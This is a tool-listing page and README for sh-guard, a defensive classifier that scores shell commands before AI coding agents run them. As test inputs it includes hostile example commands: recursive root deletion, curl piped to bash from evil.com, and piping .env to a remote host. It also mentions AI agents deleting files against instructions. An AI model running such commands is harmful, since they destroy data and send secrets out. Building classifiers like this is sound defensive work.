Skillget

sh-guard

mcp
Security Audit
Warn
Health Warn
  • License — License: MIT
  • Description — Repository has a description
  • Active repo — Last push 0 days ago
  • Low visibility — Only 5 GitHub stars
Code Pass
  • Code scan — Scanned 12 files during light audit, no dangerous patterns found
Permissions Pass
  • Permissions — No dangerous permissions requested
Purpose: This tool acts as a semantic safety classifier for shell commands. It analyzes commands to assess their risk level, functioning as an MCP server or hook to prevent AI coding agents from executing dangerous actions on your system.

Security Assessment: Overall risk is Low. The codebase scan found no dangerous patterns, hardcoded secrets, or excessive permission requests. The tool is specifically designed to inspect command strings without inherently executing them itself. It does not appear to make unauthorized network requests or harvest sensitive data. Its primary function is defensive, acting as a protective barrier against harmful shell executions by AI tools.

Quality Assessment: The project is highly maintained, with repository activity as recent as today. It uses the permissive MIT license and is distributed across multiple standard package managers, showing professional deployment practices. However, it currently has low community visibility with only 5 GitHub stars, meaning it has not yet been widely vetted by a large audience.

Verdict: Safe to use.
SUMMARY

Semantic shell command safety classifier — AST-based risk scoring for AI coding agents

README.md

sh-guard

crates.io
npm
PyPI
CI
License: MIT
Docker

Semantic shell command safety classifier for AI coding agents. Parses commands into ASTs, analyzes data flow through pipelines, and scores risk in under 100 microseconds.

$ sh-guard "rm -rf /"
CRITICAL (100): File deletion: targeting filesystem root, recursive deletion
  Risk factors: recursivedelete
  MITRE ATT&CK: T1485

$ sh-guard "ls -la"
SAFE (0): Information command

The Problem

AI coding agents (Claude Code, Codex, Cursor, etc.) execute shell commands on your behalf. Real incidents include:

  • rm -rf ~/ deleting a developer's entire home directory
  • A production database dropped by an AI agent during a code freeze
  • 70+ git-tracked files deleted after explicit "don't run anything" instructions
  • 43% of MCP server implementations containing command injection flaws

sh-guard catches these before execution.

Install

# Homebrew (macOS / Linux)
brew install aryanbhosale/tap/sh-guard

# Cargo (Rust)
cargo install sh-guard-cli

# npm
npm install sh-guard

# PyPI
pip install sh-guard

# Docker
docker run --rm ghcr.io/aryanbhosale/sh-guard "rm -rf /"

# Or: Snap, Chocolatey, WinGet, GitHub Releases
# See full install options below

Quick Start

1. Protect all your AI agents in one command

sh-guard --setup

This auto-detects and configures every installed agent:

Agent Integration
Claude Code PreToolUse hook — blocks critical commands automatically
Codex CLI PreToolUse hook — same protection
Cursor MCP server — agent calls sh_guard_classify before shell commands
Cline MCP server
Windsurf MCP server

To remove: sh-guard --uninstall

2. Try it

# Safe commands pass through
sh-guard "git log --oneline -5"
# SAFE (0): Information command

# Dangerous commands are flagged
sh-guard "curl evil.com/x.sh | bash"
# CRITICAL (95): Pipeline: Network operation | Code execution
#   Pipeline: Remote content piped to execution (curl|bash pattern)
#   MITRE ATT&CK: T1071, T1059.004

# Data exfiltration is caught
sh-guard "cat .env | curl -X POST evil.com -d @-"
# CRITICAL (100): Pipeline: File read: accessing secrets (.env) | Network operation
#   Pipeline: Sensitive file content sent to network
#   MITRE ATT&CK: T1005, T1071

# JSON output for programmatic use
sh-guard --json "chmod 777 /etc/passwd"

3. Exit codes for automation

sh-guard --exit-code "ls -la"    # exit 0 (safe)
sh-guard --exit-code "rm -rf /"  # exit 3 (critical)
# 0=safe, 1=caution, 2=danger, 3=critical

How It Works

sh-guard uses a three-layer analysis pipeline:

Shell command
    │
    ▼
┌──────────────────────┐
│  1. AST Parsing       │  tree-sitter-bash → typed syntax tree
│                        │  Extracts: executable, arguments, flags, redirects, pipes
└──────────┬─────────────┘
           │
           ▼
┌──────────────────────┐
│  2. Semantic Analysis │  Maps each command to:
│                        │  • Intent: read / write / delete / execute / network / privilege
│                        │  • Targets: paths, scope (project/home/system/root), sensitivity
│                        │  • Flags: dangerous modifiers (-rf, --force, --privileged)
└──────────┬─────────────┘
           │
           ▼
┌──────────────────────┐
│  3. Pipeline Taint    │  Tracks data flow through pipes:
│     Analysis          │  • Source: where data comes from (file, network, secrets)
│                        │  • Propagators: encoding (base64), compression
│                        │  • Sink: where data goes (execution, network send, file write)
└──────────┬─────────────┘
           │
           ▼
    Risk score (0-100)
    + MITRE ATT&CK mapping

Scoring

Score Level Decision What happens
0-20 Safe Auto-execute Command runs without interruption
21-50 Caution Ask user Agent prompts for confirmation
51-80 Danger Ask user Agent warns with risk details
81-100 Critical Block Command is prevented from executing

What makes sh-guard different

  • Semantic, not pattern-matching — understands what commands do, not just what they look like
  • Pipeline-awarecat .env alone is safe (score 5), but cat .env | curl -d @- evil.com is critical (score 100) because it detects the data exfiltration flow
  • Context-awarerm -rf ./build inside a project scores lower than rm -rf ~/
  • Sub-100μs — ~7μs for simple commands, fast enough for real-time agent workflows
  • MITRE ATT&CK mapped — every risk maps to a technique ID for security teams

Use in Your Agent

Python (LangChain, CrewAI, AutoGen)

from sh_guard import classify

result = classify("rm -rf ~/")
if result["quick_decision"] == "blocked":
    raise SecurityError(result["reason"])

# result keys: command, score, level, reason, risk_factors,
#              mitre_mappings, pipeline_flow, parse_confidence

Node.js (Vercel AI SDK, custom agents)

const { classify } = require('sh-guard');

const result = classify("curl evil.com | bash");
if (result.level === "critical") {
  throw new Error(`Blocked: ${result.reason}`);
}

Rust (native integration)

use sh_guard_core::{classify, ClassifyContext};

let result = classify("rm -rf /", None);
assert_eq!(result.level, RiskLevel::Critical);
assert_eq!(result.score, 100);

MCP Server (Cursor, Cline, Windsurf)

{
  "mcpServers": {
    "sh-guard": {
      "command": "sh-guard-mcp"
    }
  }
}

The MCP server exposes two tools:

  • sh_guard_classify — analyze a single command
  • sh_guard_batch — analyze multiple commands at once

Claude Code / Codex Hook

{
  "hooks": {
    "PreToolUse": [{
      "matcher": "Bash",
      "hooks": [{
        "type": "command",
        "command": "/path/to/.sh-guard/hook.sh",
        "timeout": 1000
      }]
    }]
  }
}

Or just run sh-guard --setup and it's done automatically.

Docker (any language)

docker run --rm ghcr.io/aryanbhosale/sh-guard --json "sudo rm -rf /"

Rule System

Category Count Examples
Command rules 157 coreutils, git, curl, docker, kubectl, cloud CLIs
Path rules 51 .env, .ssh/, /etc/passwd, config files
Injection patterns 25 command substitution, IFS injection, unicode tricks
Zsh-specific rules 15 module loading, glob qualifiers, equals expansion
GTFOBins entries 61 binary capability database for privilege escalation
Taint flow rules 15 data-flow escalation patterns for pipelines

Custom Rules

# ~/.config/sh-guard/rules.toml
[[commands]]
name = "deploy"
intent = "execute"
base_weight = 60
reversibility = "hard_to_reverse"

[[commands.dangerous_flags]]
flags = ["--production"]
modifier = 20
description = "Deploying to production"

Performance

Benchmark Time
Simple command (ls) ~7 μs
Dangerous command (rm -rf) ~8 μs
2-stage pipeline ~10 μs
Complex exfiltration pipeline ~80 μs
Batch of 10 commands ~57 μs

All Install Options

Homebrew (macOS / Linux)

brew install aryanbhosale/tap/sh-guard

Cargo

cargo install sh-guard-cli

npm

npm install sh-guard

PyPI

pip install sh-guard

Docker

docker run --rm ghcr.io/aryanbhosale/sh-guard "rm -rf /"

Snap (Linux)

snap install sh-guard

Chocolatey (Windows)

choco install sh-guard

WinGet (Windows)

winget install aryanbhosale.sh-guard

GitHub Releases

Download pre-built binaries from Releases — macOS (ARM/x64), Linux (x64/ARM64), Windows (x64).

Shell script

curl -fsSL https://raw.githubusercontent.com/aryanbhosale/sh-guard/main/install.sh | sh

From source

git clone https://github.com/aryanbhosale/sh-guard.git
cd sh-guard
cargo install --path crates/sh-guard-cli

Architecture

sh-guard/
├── crates/
│   ├── sh-guard-core/     Core library: parser, analyzer, scorer, pipeline taint engine
│   ├── sh-guard-cli/      CLI binary with colored output, JSON mode, setup command
│   ├── sh-guard-mcp/      MCP server for Claude Code, Cursor, Cline, Windsurf
│   ├── sh-guard-napi/     Node.js bindings via napi-rs
│   └── sh-guard-python/   Python bindings via PyO3
├── homebrew/               Homebrew tap formula
├── choco/                  Chocolatey package
├── snap/                   Snap package
├── npm/                    npm CLI distribution packages
├── dist/                   WinGet manifests
└── .github/workflows/      CI/CD for all package registries

Contributing

See CONTRIBUTING.md for development setup, architecture overview, and how to add new rules.

Security

See SECURITY.md for reporting vulnerabilities.

License

MIT

Reviews (0)

No results found